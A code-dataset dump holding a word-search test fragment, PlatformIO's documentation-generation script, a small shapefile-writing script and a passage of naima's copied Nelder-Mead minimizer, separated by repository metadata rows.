runtest(
"search",
args=(
"a",
AsStdinWordlist(["alpha", "beta", "gama", "omega"]),
color_arg_true,
),
ret=AsWordlist(
[
f"{red('a')}lpha",
f"bet{red('a')}",
f"g{red('a')}ma",
f"omeg{red('a')}",
]
),
)
runtest(
"search",
args=("bc", AsStdinWordlist(["abc", "xbc", "eff", "bxc"]), color_arg_true),
ret=AsWordlist([f"a{red('bc')}", f"x{red('bc')}"]),
)
| 27.720588
| 87
| 0.468966
|
90dc887dcea1ff2eedefbc8d6852c4d9ad9a64cb
| 33,321
|
py
|
Python
|
scripts/docspregen.py
|
ufo2011/platformio-core
|
0ceae62701731f8b32c34d7993a34dea34aea59c
|
[
"Apache-2.0"
] | null | null | null |
scripts/docspregen.py
|
ufo2011/platformio-core
|
0ceae62701731f8b32c34d7993a34dea34aea59c
|
[
"Apache-2.0"
] | null | null | null |
scripts/docspregen.py
|
ufo2011/platformio-core
|
0ceae62701731f8b32c34d7993a34dea34aea59c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import sys
import tempfile
from urllib.parse import ParseResult, urlparse, urlunparse
sys.path.append("..")
import click # noqa: E402
from platformio import fs, util # noqa: E402
from platformio.package.manager.platform import PlatformPackageManager # noqa: E402
from platformio.platform.factory import PlatformFactory # noqa: E402
RST_COPYRIGHT = """.. Copyright (c) 2014-present PlatformIO <contact@platformio.org>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
DOCS_ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "docs")
)
REGCLIENT = PlatformPackageManager().get_registry_client_instance()
def reg_package_url(type_, owner, name):
if type_ == "library":
type_ = "libraries"
else:
type_ += "s"
return f"https://registry.platformio.org/{type_}/{owner}/{name}"
def campaign_url(url, source="platformio.org", medium="docs"):
data = urlparse(url)
query = data.query
if query:
query += "&"
query += "utm_source=%s&utm_medium=%s" % (source, medium)
return urlunparse(
ParseResult(
data.scheme, data.netloc, data.path, data.params, query, data.fragment
)
)
def install_platforms():
print("Installing platforms...")
page = 1
pm = PlatformPackageManager()
while True:
result = REGCLIENT.list_packages(qualifiers=dict(types=["platform"]), page=page)
for item in result["items"]:
spec = "%s/%s" % (item["owner"]["username"], item["name"])
skip_conds = [
item["owner"]["username"] != "platformio",
item["tier"] == "community",
]
if all(skip_conds):
click.secho("Skip community platform: %s" % spec, fg="yellow")
continue
pm.install(spec, skip_dependencies=True)
page += 1
if not result["items"] or result["page"] * result["limit"] >= result["total"]:
break
@functools.cache
def get_frameworks():
items = {}
for pkg in PlatformPackageManager().get_installed():
p = PlatformFactory.new(pkg)
for name, options in (p.frameworks or {}).items():
if name in items or not set(options.keys()).issuperset(
set(["title", "description"])
):
continue
items[name] = dict(
name=name, title=options["title"], description=options["description"]
)
return sorted(items.values(), key=lambda item: item["name"])
def is_compat_platform_and_framework(platform, framework):
p = PlatformFactory.new(platform)
return framework in (p.frameworks or {}).keys()
def generate_boards_table(boards, skip_columns=None):
columns = [
("Name", ":ref:`board_{platform}_{id}`"),
("Platform", ":ref:`platform_{platform}`"),
("Debug", "{debug}"),
("MCU", "{mcu}"),
("Frequency", "{f_cpu}MHz"),
("Flash", "{rom}"),
("RAM", "{ram}"),
]
lines = []
lines.append(
"""
.. list-table::
:header-rows: 1
"""
)
# add header
for (name, template) in columns:
if skip_columns and name in skip_columns:
continue
prefix = " * - " if name == "Name" else " - "
lines.append(prefix + name)
for data in sorted(boards, key=lambda item: item["name"]):
has_onboard_debug = data.get("debug") and any(
t.get("onboard") for (_, t) in data["debug"]["tools"].items()
)
debug = "No"
if has_onboard_debug:
debug = "On-board"
elif data.get("debug"):
debug = "External"
variables = dict(
id=data["id"],
name=data["name"],
platform=data["platform"],
debug=debug,
mcu=data["mcu"].upper(),
f_cpu=int(data["fcpu"] / 1000000.0),
ram=fs.humanize_file_size(data["ram"]),
rom=fs.humanize_file_size(data["rom"]),
)
for (name, template) in columns:
if skip_columns and name in skip_columns:
continue
prefix = " * - " if name == "Name" else " - "
lines.append(prefix + template.format(**variables))
if lines:
lines.append("")
return lines
def generate_frameworks_contents(frameworks):
if not frameworks:
return []
lines = []
lines.append(
"""
Frameworks
----------
.. list-table::
:header-rows: 1
* - Name
- Description"""
)
known = set()
for framework in get_frameworks():
known.add(framework["name"])
if framework["name"] not in frameworks:
continue
lines.append(
"""
* - :ref:`framework_{name}`
- {description}""".format(
**framework
)
)
if set(frameworks) - known:
click.secho("Unknown frameworks %s " % (set(frameworks) - known), fg="red")
return lines
def generate_platforms_contents(platforms):
if not platforms:
return []
lines = []
lines.append(
"""
Platforms
---------
.. list-table::
:header-rows: 1
* - Name
- Description"""
)
for name in sorted(platforms):
p = PlatformFactory.new(name)
lines.append(
"""
* - :ref:`platform_{name}`
- {description}""".format(
name=p.name, description=p.description
)
)
return lines
def generate_debug_contents(boards, skip_board_columns=None, extra_rst=None):
if not skip_board_columns:
skip_board_columns = []
skip_board_columns.append("Debug")
lines = []
onboard_debug = [
b
for b in boards
if b.get("debug")
and any(t.get("onboard") for (_, t) in b["debug"]["tools"].items())
]
external_debug = [b for b in boards if b.get("debug") and b not in onboard_debug]
if not onboard_debug and not external_debug:
return lines
lines.append(
"""
Debugging
---------
:ref:`piodebug` - "1-click" solution for debugging with a zero configuration.
.. contents::
:local:
"""
)
if extra_rst:
lines.append(".. include:: %s" % extra_rst)
lines.append(
"""
Tools & Debug Probes
~~~~~~~~~~~~~~~~~~~~
Supported debugging tools are listed in "Debug" column. For more detailed
information, please scroll table by horizontal.
You can switch between debugging :ref:`debugging_tools` using
:ref:`projectconf_debug_tool` option in :ref:`projectconf`.
.. warning::
You will need to install debug tool drivers depending on your system.
Please click on compatible debug tool below for the further instructions.
"""
)
if onboard_debug:
lines.append(
"""
On-Board Debug Tools
^^^^^^^^^^^^^^^^^^^^
Boards listed below have on-board debug probe and **ARE READY** for debugging!
You do not need to use/buy external debug probe.
"""
)
lines.extend(
generate_boards_table(onboard_debug, skip_columns=skip_board_columns)
)
if external_debug:
lines.append(
"""
External Debug Tools
^^^^^^^^^^^^^^^^^^^^
Boards listed below are compatible with :ref:`piodebug` but **DEPEND ON**
external debug probe. They **ARE NOT READY** for debugging.
Please click on board name for the further details.
"""
)
lines.extend(
generate_boards_table(external_debug, skip_columns=skip_board_columns)
)
return lines
def generate_packages(platform, packages, is_embedded):
if not packages:
return
lines = []
lines.append(
"""
Packages
--------
"""
)
lines.append(
""".. list-table::
:header-rows: 1
* - Name
- Description"""
)
for name, options in dict(sorted(packages.items())).items():
package = REGCLIENT.get_package(
"tool", options.get("owner", "platformio"), name
)
lines.append(
"""
* - `{name} <{url}>`__
- {description}""".format(
name=package["name"],
url=reg_package_url(
"tool", package["owner"]["username"], package["name"]
),
description=package["description"],
)
)
if is_embedded:
lines.append(
"""
.. warning::
**Linux Users**:
* Install "udev" rules :ref:`faq_udev_rules`
* Raspberry Pi users, please read this article
`Enable serial port on Raspberry Pi <https://hallard.me/enable-serial-port-on-raspberry-pi/>`__.
"""
)
if platform == "teensy":
lines.append(
"""
**Windows Users:**
Teensy programming uses only Windows built-in HID
drivers. When Teensy is programmed to act as a USB Serial device,
Windows XP, Vista, 7 and 8 require `this serial driver
<http://www.pjrc.com/teensy/serial_install.exe>`_
is needed to access the COM port your program uses. No special driver
installation is necessary on Windows 10.
"""
)
else:
lines.append(
"""
**Windows Users:**
Please check that you have a correctly installed USB driver from board
manufacturer
"""
)
return "\n".join(lines)
def generate_platform(pkg, rst_dir):
name = pkg.metadata.name
print("Processing platform: %s" % name)
compatible_boards = [
board
for board in PlatformPackageManager().get_installed_boards()
if name == board["platform"]
]
lines = []
lines.append(RST_COPYRIGHT)
p = PlatformFactory.new(name)
assert p.repository_url.endswith(".git")
github_url = p.repository_url[:-4]
registry_url = reg_package_url("platform", pkg.metadata.spec.owner, name)
lines.append(".. _platform_%s:" % p.name)
lines.append("")
lines.append(p.title)
lines.append("=" * len(p.title))
lines.append("")
lines.append(":Registry:")
lines.append(" `%s <%s>`__" % (registry_url, registry_url))
lines.append(":Configuration:")
lines.append(" :ref:`projectconf_env_platform` = ``%s``" % p.name)
lines.append("")
lines.append(p.description)
lines.append(
"""
For more detailed information please visit `vendor site <%s>`_."""
% campaign_url(p.homepage)
)
lines.append(
"""
.. contents:: Contents
:local:
:depth: 1
"""
)
#
# Extra
#
if os.path.isfile(os.path.join(rst_dir, "%s_extra.rst" % name)):
lines.append(".. include:: %s_extra.rst" % p.name)
#
# Examples
#
lines.append(
"""
Examples
--------
Examples are listed from `%s development platform repository <%s>`_:
"""
% (p.title, campaign_url("%s/tree/master/examples" % github_url))
)
examples_dir = os.path.join(p.get_dir(), "examples")
if os.path.isdir(examples_dir):
for eitem in os.listdir(examples_dir):
example_dir = os.path.join(examples_dir, eitem)
if not os.path.isdir(example_dir) or not os.listdir(example_dir):
continue
url = "%s/tree/master/examples/%s" % (github_url, eitem)
lines.append("* `%s <%s>`_" % (eitem, campaign_url(url)))
#
# Debugging
#
if compatible_boards:
lines.extend(
generate_debug_contents(
compatible_boards,
skip_board_columns=["Platform"],
extra_rst="%s_debug.rst" % name
if os.path.isfile(os.path.join(rst_dir, "%s_debug.rst" % name))
else None,
)
)
#
# Development version of dev/platform
#
lines.append(
"""
Stable and upstream versions
----------------------------
You can switch between `stable releases <{github_url}/releases>`__
of {title} development platform and the latest upstream version using
:ref:`projectconf_env_platform` option in :ref:`projectconf` as described below.
Stable
~~~~~~
.. code-block:: ini
; Latest stable version
[env:latest_stable]
platform = {name}
board = ...
; Custom stable version
[env:custom_stable]
platform = {name}@x.y.z
board = ...
Upstream
~~~~~~~~
.. code-block:: ini
[env:upstream_develop]
platform = {github_url}.git
board = ...
""".format(
name=p.name, title=p.title, github_url=github_url
)
)
#
# Packages
#
_packages_content = generate_packages(name, p.packages, p.is_embedded())
if _packages_content:
lines.append(_packages_content)
#
# Frameworks
#
compatible_frameworks = []
for framework in get_frameworks():
if is_compat_platform_and_framework(name, framework["name"]):
compatible_frameworks.append(framework["name"])
lines.extend(generate_frameworks_contents(compatible_frameworks))
#
# Boards
#
if compatible_boards:
vendors = {}
for board in compatible_boards:
if board["vendor"] not in vendors:
vendors[board["vendor"]] = []
vendors[board["vendor"]].append(board)
lines.append(
"""
Boards
------
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll the tables below by
horizontally.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards, skip_columns=["Platform"]))
return "\n".join(lines)
def update_platform_docs():
platforms_dir = os.path.join(DOCS_ROOT_DIR, "platforms")
for pkg in PlatformPackageManager().get_installed():
rst_path = os.path.join(platforms_dir, "%s.rst" % pkg.metadata.name)
with open(rst_path, "w") as f:
f.write(generate_platform(pkg, platforms_dir))
def generate_framework(type_, framework, rst_dir=None):
print("Processing framework: %s" % type_)
compatible_platforms = [
pkg
for pkg in PlatformPackageManager().get_installed()
if is_compat_platform_and_framework(pkg.metadata.name, type_)
]
compatible_boards = [
board
for board in PlatformPackageManager().get_installed_boards()
if type_ in board["frameworks"]
]
lines = []
lines.append(RST_COPYRIGHT)
lines.append(".. _framework_%s:" % type_)
lines.append("")
lines.append(framework["title"])
lines.append("=" * len(framework["title"]))
lines.append("")
lines.append(":Configuration:")
lines.append(" :ref:`projectconf_env_framework` = ``%s``" % type_)
lines.append("")
lines.append(framework["description"])
lines.append(
"""
.. contents:: Contents
:local:
:depth: 1"""
)
# Extra
if os.path.isfile(os.path.join(rst_dir, "%s_extra.rst" % type_)):
lines.append(".. include:: %s_extra.rst" % type_)
if compatible_platforms:
# Platforms
lines.extend(
generate_platforms_contents(
[pkg.metadata.name for pkg in compatible_platforms]
)
)
# examples
lines.append(
"""
Examples
--------
"""
)
for pkg in compatible_platforms:
p = PlatformFactory.new(pkg)
lines.append(
"* `%s for %s <%s>`_"
% (
framework["title"],
p.title,
campaign_url("%s/tree/master/examples" % p.repository_url[:-4]),
)
)
#
# Debugging
#
if compatible_boards:
lines.extend(
generate_debug_contents(
compatible_boards,
extra_rst="%s_debug.rst" % type_
if os.path.isfile(os.path.join(rst_dir, "%s_debug.rst" % type_))
else None,
)
)
#
# Boards
#
if compatible_boards:
vendors = {}
for board in compatible_boards:
if board["vendor"] not in vendors:
vendors[board["vendor"]] = []
vendors[board["vendor"]].append(board)
lines.append(
"""
Boards
------
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll the tables below by horizontally.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards))
return "\n".join(lines)
def update_framework_docs():
frameworks_dir = os.path.join(DOCS_ROOT_DIR, "frameworks")
for framework in get_frameworks():
name = framework["name"]
rst_path = os.path.join(frameworks_dir, "%s.rst" % name)
with open(rst_path, "w") as f:
f.write(generate_framework(name, framework, frameworks_dir))
def update_boards():
print("Updating boards...")
lines = []
lines.append(RST_COPYRIGHT)
lines.append(".. _boards:")
lines.append("")
lines.append("Boards")
lines.append("======")
lines.append(
"""
Rapid Embedded Development, Continuous and IDE integration in a few
steps with PlatformIO thanks to built-in project generator for the most
popular embedded boards and IDEs.
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
platforms = {}
installed_boards = PlatformPackageManager().get_installed_boards()
for data in installed_boards:
platform = data["platform"]
if platform in platforms:
platforms[platform].append(data)
else:
platforms[platform] = [data]
for platform, boards in sorted(platforms.items()):
p = PlatformFactory.new(platform)
lines.append(p.title)
lines.append("-" * len(p.title))
lines.append(
"""
.. toctree::
:maxdepth: 1
"""
)
for board in sorted(boards, key=lambda item: item["name"]):
lines.append(" %s/%s" % (platform, board["id"]))
lines.append("")
emboards_rst = os.path.join(DOCS_ROOT_DIR, "boards", "index.rst")
with open(emboards_rst, "w") as f:
f.write("\n".join(lines))
# individual board page
for data in installed_boards:
rst_path = os.path.join(
DOCS_ROOT_DIR, "boards", data["platform"], "%s.rst" % data["id"]
)
if not os.path.isdir(os.path.dirname(rst_path)):
os.makedirs(os.path.dirname(rst_path))
update_embedded_board(rst_path, data)
def update_embedded_board(rst_path, board):
platform = PlatformFactory.new(board["platform"])
board_config = platform.board_config(board["id"])
board_manifest_url = platform.repository_url
assert board_manifest_url
if board_manifest_url.endswith(".git"):
board_manifest_url = board_manifest_url[:-4]
board_manifest_url += "/blob/master/boards/%s.json" % board["id"]
variables = dict(
id=board["id"],
name=board["name"],
platform=board["platform"],
platform_description=platform.description,
url=campaign_url(board["url"]),
mcu=board_config.get("build", {}).get("mcu", ""),
mcu_upper=board["mcu"].upper(),
f_cpu=board["fcpu"],
f_cpu_mhz=int(int(board["fcpu"]) / 1000000),
ram=fs.humanize_file_size(board["ram"]),
rom=fs.humanize_file_size(board["rom"]),
vendor=board["vendor"],
board_manifest_url=board_manifest_url,
upload_protocol=board_config.get("upload.protocol", ""),
)
lines = [RST_COPYRIGHT]
lines.append(".. _board_{platform}_{id}:".format(**variables))
lines.append("")
lines.append(board["name"])
lines.append("=" * len(board["name"]))
lines.append(
"""
.. contents::
Hardware
--------
Platform :ref:`platform_{platform}`: {platform_description}
.. list-table::
* - **Microcontroller**
- {mcu_upper}
* - **Frequency**
- {f_cpu_mhz:d}MHz
* - **Flash**
- {rom}
* - **RAM**
- {ram}
* - **Vendor**
- `{vendor} <{url}>`__
""".format(
**variables
)
)
#
# Configuration
#
lines.append(
"""
Configuration
-------------
Please use ``{id}`` ID for :ref:`projectconf_env_board` option in :ref:`projectconf`:
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
You can override default {name} settings per build environment using
``board_***`` option, where ``***`` is a JSON object path from
board manifest `{id}.json <{board_manifest_url}>`_. For example,
``board_build.mcu``, ``board_build.f_cpu``, etc.
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
; change microcontroller
board_build.mcu = {mcu}
; change MCU frequency
board_build.f_cpu = {f_cpu}L
""".format(
**variables
)
)
#
# Uploading
#
upload_protocols = board_config.get("upload.protocols", [])
if len(upload_protocols) > 1:
lines.append(
"""
Uploading
---------
%s supports the following uploading protocols:
"""
% board["name"]
)
for protocol in sorted(upload_protocols):
lines.append("* ``%s``" % protocol)
lines.append(
"""
Default protocol is ``%s``"""
% variables["upload_protocol"]
)
lines.append(
"""
You can change upload protocol using :ref:`projectconf_upload_protocol` option:
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
upload_protocol = {upload_protocol}
""".format(
**variables
)
)
#
# Debugging
#
lines.append("Debugging")
lines.append("---------")
if not board.get("debug"):
lines.append(
":ref:`piodebug` currently does not support {name} board.".format(
**variables
)
)
else:
default_debug_tool = board_config.get_debug_tool_name()
has_onboard_debug = any(
t.get("onboard") for (_, t) in board["debug"]["tools"].items()
)
lines.append(
"""
:ref:`piodebug` - "1-click" solution for debugging with a zero configuration.
.. warning::
You will need to install debug tool drivers depending on your system.
Please click on compatible debug tool below for the further
instructions and configuration information.
You can switch between debugging :ref:`debugging_tools` using
:ref:`projectconf_debug_tool` option in :ref:`projectconf`.
"""
)
if has_onboard_debug:
lines.append(
"{name} has on-board debug probe and **IS READY** for "
"debugging. You don't need to use/buy external debug probe.".format(
**variables
)
)
else:
lines.append(
"{name} does not have on-board debug probe and **IS NOT "
"READY** for debugging. You will need to use/buy one of "
"external probe listed below.".format(**variables)
)
lines.append(
"""
.. list-table::
:header-rows: 1
* - Compatible Tools
- On-board
- Default"""
)
for (tool_name, tool_data) in sorted(board["debug"]["tools"].items()):
lines.append(
""" * - :ref:`debugging_tool_{name}`
- {onboard}
- {default}""".format(
name=tool_name,
onboard="Yes" if tool_data.get("onboard") else "",
default="Yes" if tool_name == default_debug_tool else "",
)
)
if board["frameworks"]:
lines.extend(generate_frameworks_contents(board["frameworks"]))
with open(rst_path, "w") as f:
f.write("\n".join(lines))
def update_debugging():
tool_to_platforms = {}
tool_to_boards = {}
vendors = {}
platforms = []
frameworks = []
for data in PlatformPackageManager().get_installed_boards():
if not data.get("debug"):
continue
for tool in data["debug"]["tools"]:
tool = str(tool)
if tool not in tool_to_platforms:
tool_to_platforms[tool] = []
tool_to_platforms[tool].append(data["platform"])
if tool not in tool_to_boards:
tool_to_boards[tool] = []
tool_to_boards[tool].append(data["id"])
platforms.append(data["platform"])
frameworks.extend(data["frameworks"])
vendor = data["vendor"]
if vendor in vendors:
vendors[vendor].append(data)
else:
vendors[vendor] = [data]
platforms = sorted(set(platforms))
frameworks = sorted(set(frameworks))
lines = [".. _debugging_platforms:"]
lines.extend(generate_platforms_contents(platforms))
lines.extend(generate_frameworks_contents(frameworks))
# Boards
lines.append(
"""
Boards
------
.. note::
For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards))
# save
with open(
os.path.join(fs.get_source_dir(), "..", "docs", "plus", "debugging.rst"), "r+"
) as fp:
content = fp.read()
fp.seek(0)
fp.truncate()
fp.write(
content[: content.index(".. _debugging_platforms:")] + "\n".join(lines)
)
# Debug tools
for tool, platforms in tool_to_platforms.items():
tool_path = os.path.join(DOCS_ROOT_DIR, "plus", "debug-tools", "%s.rst" % tool)
if not os.path.isfile(tool_path):
click.secho("Unknown debug tool `%s`" % tool, fg="red")
continue
platforms = sorted(set(platforms))
lines = [".. begin_platforms"]
lines.extend(generate_platforms_contents(platforms))
tool_frameworks = []
for platform in platforms:
for framework in frameworks:
if is_compat_platform_and_framework(platform, framework):
tool_frameworks.append(framework)
lines.extend(generate_frameworks_contents(tool_frameworks))
lines.append(
"""
Boards
------
.. note::
For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
lines.extend(
generate_boards_table(
[
b
for b in PlatformPackageManager().get_installed_boards()
if b["id"] in tool_to_boards[tool]
],
skip_columns=None,
)
)
with open(tool_path, "r+") as fp:
content = fp.read()
fp.seek(0)
fp.truncate()
fp.write(content[: content.index(".. begin_platforms")] + "\n".join(lines))
def update_project_examples():
platform_readme_tpl = """
# {title}: development platform for [PlatformIO](https://platformio.org)
{description}
* [Home](https://platformio.org/platforms/{name}) (home page in PlatformIO Registry)
* [Documentation](https://docs.platformio.org/page/platforms/{name}.html) (advanced usage, packages, boards, frameworks, etc.)
# Examples
{examples}
"""
framework_readme_tpl = """
# {title}: framework for [PlatformIO](https://platformio.org)
{description}
* [Home](https://platformio.org/frameworks/{name}) (home page in PlatformIO Registry)
* [Documentation](https://docs.platformio.org/page/frameworks/{name}.html)
# Examples
{examples}
"""
project_examples_dir = os.path.join(fs.get_source_dir(), "..", "examples")
framework_examples_md_lines = {}
embedded = []
desktop = []
for pkg in PlatformPackageManager().get_installed():
p = PlatformFactory.new(pkg)
github_url = p.repository_url[:-4]
# Platform README
platform_examples_dir = os.path.join(p.get_dir(), "examples")
examples_md_lines = []
if os.path.isdir(platform_examples_dir):
for item in sorted(os.listdir(platform_examples_dir)):
example_dir = os.path.join(platform_examples_dir, item)
if not os.path.isdir(example_dir) or not os.listdir(example_dir):
continue
url = "%s/tree/master/examples/%s" % (github_url, item)
examples_md_lines.append("* [%s](%s)" % (item, url))
readme_dir = os.path.join(project_examples_dir, "platforms", p.name)
if not os.path.isdir(readme_dir):
os.makedirs(readme_dir)
with open(os.path.join(readme_dir, "README.md"), "w") as fp:
fp.write(
platform_readme_tpl.format(
name=p.name,
title=p.title,
description=p.description,
examples="\n".join(examples_md_lines),
)
)
# Framework README
for framework in get_frameworks():
if not is_compat_platform_and_framework(p.name, framework["name"]):
continue
if framework["name"] not in framework_examples_md_lines:
framework_examples_md_lines[framework["name"]] = []
lines = []
lines.append("- [%s](%s)" % (p.title, github_url))
lines.extend(" %s" % line for line in examples_md_lines)
lines.append("")
framework_examples_md_lines[framework["name"]].extend(lines)
# Root README
line = "* [%s](%s)" % (p.title, "%s/tree/master/examples" % github_url)
if p.is_embedded():
embedded.append(line)
else:
desktop.append(line)
# Frameworks
frameworks = []
for framework in get_frameworks():
if framework["name"] not in framework_examples_md_lines:
continue
readme_dir = os.path.join(project_examples_dir, "frameworks", framework["name"])
if not os.path.isdir(readme_dir):
os.makedirs(readme_dir)
with open(os.path.join(readme_dir, "README.md"), "w") as fp:
fp.write(
framework_readme_tpl.format(
name=framework["name"],
title=framework["title"],
description=framework["description"],
examples="\n".join(framework_examples_md_lines[framework["name"]]),
)
)
url = campaign_url(
"https://docs.platformio.org/en/latest/frameworks/%s.html#examples"
% framework["name"],
source="github",
medium="examples",
)
frameworks.append("* [%s](%s)" % (framework["title"], url))
with open(os.path.join(project_examples_dir, "README.md"), "w") as fp:
fp.write(
"""# PlatformIO Project Examples
- [Development platforms](#development-platforms):
- [Embedded](#embedded)
- [Desktop](#desktop)
- [Frameworks](#frameworks)
## Development platforms
### Embedded
%s
### Desktop
%s
## Frameworks
%s
"""
% ("\n".join(embedded), "\n".join(desktop), "\n".join(frameworks))
)
def main():
with tempfile.TemporaryDirectory() as tmp_dir:
print("Core directory: %s" % tmp_dir)
os.environ["PLATFORMIO_CORE_DIR"] = tmp_dir
install_platforms()
update_platform_docs()
update_framework_docs()
update_boards()
update_debugging()
update_project_examples()
if __name__ == "__main__":
sys.exit(main())
| 28.455167
| 126
| 0.581855
|
2ca10ad6bb6480220070f6667f39518fd6e94a5b
| 533
|
py
|
Python
|
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
# Polsby Popper
import shapefile
#import shapely
from shapely import geometry
import math
f = open("voronoi_polygons.txt")
allLines = f.readlines()
i = 1
w = shapefile.Writer("MyGeneratedShapefiles/test_2")
w.field('TFIELD', 'C')
for currentLine in allLines:
points = currentLine.split()
mainPoly = []
for point in points:
vertexStrList = point.split(",")
vertexList = [float(vertexStrList[i]) for i in range(2)]
mainPoly.append(vertexList)
w.poly([mainPoly])
w.record(TFIELD=str(i))
i += 1
f.close()
w.close()
| 17.193548
| 58
| 0.707317
|
f30c1b3ffb93028da3c23c02eed170e36ef24bc0
| 6,363
|
py
|
Python
|
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module includes a copy of the scipy.optimize._minimize_neldermead
# function modified to use relative tolerances instead of absolute. See issue at
# https://github.com/scipy/scipy/issues/5051
# minimize is a thin wrapper that behaves like scipy.optimize.minimize
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import numpy
from numpy import (
atleast_1d,
eye,
mgrid,
argmin,
zeros,
shape,
squeeze,
vectorize,
asarray,
sqrt,
Inf,
asfarray,
isinf,
)
# standard status messages of optimizers
_status_message = {
"success": "Optimization terminated successfully.",
"maxfev": "Maximum number of function evaluations has " "been exceeded.",
"maxiter": "Maximum number of iterations has been " "exceeded.",
"pr_loss": "Desired error not necessarily achieved due "
"to precision loss.",
}
def wrap_function(function, args):
ncalls = [0]
if function is None:
return ncalls, None
def function_wrapper(*wrapper_args):
ncalls[0] += 1
return function(*(wrapper_args + args))
return ncalls, function_wrapper
class OptimizeResult(dict):
""" Represents the optimization result.
"""
pass
class OptimizeWarning(UserWarning):
pass
def minimize(func, x0, args=(), options={}, method=None):
return _minimize_neldermead(func, x0, args=args, **options)
def _minimize_neldermead(
func,
x0,
args=(),
callback=None,
xtol=1e-4,
ftol=1e-4,
maxiter=None,
maxfev=None,
disp=False,
return_all=False,
): # pragma: no cover
"""
Minimization of scalar function of one or more variables using the
Nelder-Mead algorithm.
Options for the Nelder-Mead algorithm are:
disp : bool
Set to True to print convergence messages.
xtol : float
Relative error in solution `xopt` acceptable for convergence.
ftol : float
Relative error in ``fun(xopt)`` acceptable for convergence.
maxiter : int
Maximum number of iterations to perform.
maxfev : int
Maximum number of function evaluations to make.
"""
maxfun = maxfev
retall = return_all
fcalls, func = wrap_function(func, args)
x0 = asfarray(x0).flatten()
N = len(x0)
rank = len(x0.shape)
if not -1 < rank < 2:
raise ValueError("Initial guess must be a scalar or rank-1 sequence.")
if maxiter is None:
maxiter = N * 200
if maxfun is None:
maxfun = N * 200
rho = 1
chi = 2
psi = 0.5
sigma = 0.5
one2np1 = list(range(1, N + 1))
if rank == 0:
sim = numpy.zeros((N + 1,), dtype=x0.dtype)
else:
sim = numpy.zeros((N + 1, N), dtype=x0.dtype)
fsim = numpy.zeros((N + 1,), float)
sim[0] = x0
if retall:
allvecs = [sim[0]]
fsim[0] = func(x0)
nonzdelt = 0.05
zdelt = 0.00025
for k in range(0, N):
y = numpy.array(x0, copy=True)
if y[k] != 0:
y[k] = (1 + nonzdelt) * y[k]
else:
y[k] = zdelt
sim[k + 1] = y
f = func(y)
fsim[k + 1] = f
ind = numpy.argsort(fsim)
fsim = numpy.take(fsim, ind, 0)
# sort so sim[0,:] has the lowest function value
sim = numpy.take(sim, ind, 0)
iterations = 1
while fcalls[0] < maxfun and iterations < maxiter:
if (
numpy.max(numpy.ravel(numpy.abs((sim[1:] - sim[0]) / sim[0])))
<= xtol
and numpy.max(numpy.abs((fsim[0] - fsim[1:]) / fsim[0])) <= ftol
):
break
xbar = numpy.add.reduce(sim[:-1], 0) / N
xr = (1 + rho) * xbar - rho * sim[-1]
fxr = func(xr)
doshrink = 0
if fxr < fsim[0]:
xe = (1 + rho * chi) * xbar - rho * chi * sim[-1]
fxe = func(xe)
if fxe < fxr:
sim[-1] = xe
fsim[-1] = fxe
else:
sim[-1] = xr
fsim[-1] = fxr
else: # fsim[0] <= fxr
if fxr < fsim[-2]:
sim[-1] = xr
fsim[-1] = fxr
else: # fxr >= fsim[-2]
# Perform contraction
if fxr < fsim[-1]:
xc = (1 + psi * rho) * xbar - psi * rho * sim[-1]
fxc = func(xc)
if fxc <= fxr:
sim[-1] = xc
fsim[-1] = fxc
else:
doshrink = 1
else:
# Perform an inside contraction
xcc = (1 - psi) * xbar + psi * sim[-1]
fxcc = func(xcc)
if fxcc < fsim[-1]:
sim[-1] = xcc
fsim[-1] = fxcc
else:
doshrink = 1
if doshrink:
